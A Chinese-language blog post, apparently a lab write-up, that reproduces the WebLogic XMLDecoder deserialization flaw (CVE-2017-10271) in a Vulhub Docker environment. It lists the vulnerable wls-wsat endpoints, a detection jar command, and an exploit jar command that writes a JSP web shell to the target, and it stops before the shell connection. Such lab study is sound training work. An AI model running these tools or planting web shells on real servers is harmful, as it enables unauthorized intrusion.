被360眾測靶場殘虐,所以決定把這些常規漏洞(Vulhub)都學一下他們的利用。
環境:
docker 搭建weblogic XMLDecoder反序列化環境
kali虛擬機
本地物理機Win10 谷歌瀏覽器 Git Bash
工具:https://github.com/RealBearcat/Oracle-WebLogic-CVE-2017-10271
環境搭建:
git clone https://github.com/vulhub/vulhub.git #可以看到有很多漏洞環境
我這個是從一個安裝包解壓來的,不過都是一樣的,上面給的方式更方便一些,如果你可以科學&上網的話。
cd vulhub/weblogic/CVE-2017-10271 #選中這一目錄 進去開啟漏洞環境
docker-compose build #此處出現過一個坑 有可能會報一下錯誤
錯誤原因是有一個編譯包中缺少一個py模塊,解決方式
docker-compose up -d #部署開啟漏洞環境如下 要是不知道網址 可以ifconfig一下
檢測:檢測其實不太重要,因為這個漏洞是weblogic系列的,大家一般都會有這一系的檢測工具
手動檢測:訪問這些目錄 出現下圖就說明大可能存在
/wls-wsat/CoordinatorPortType /wls-wsat/RegistrationPortTypeRPC /wls-wsat/ParticipantPortType /wls-wsat/RegistrationRequesterPortType /wls-wsat/CoordinatorPortType11 /wls-wsat/RegistrationPortTypeRPC11 /wls-wsat/ParticipantPortType11 /wls-wsat/RegistrationRequesterPortType11
工具檢測:
java -jar WebLogic-Wls-wsat-XMLDecoder.jar -u http://192.168.80.1:7001
工具利用:寫命令shell
java -jar WebLogic_Wls-Wsat_RCE_Exp.jar http://192.168.80.129:7001 z.jsp #后面的z.jsp名字可以自己起 jsp后綴不能變
嘗試瀏覽器連接: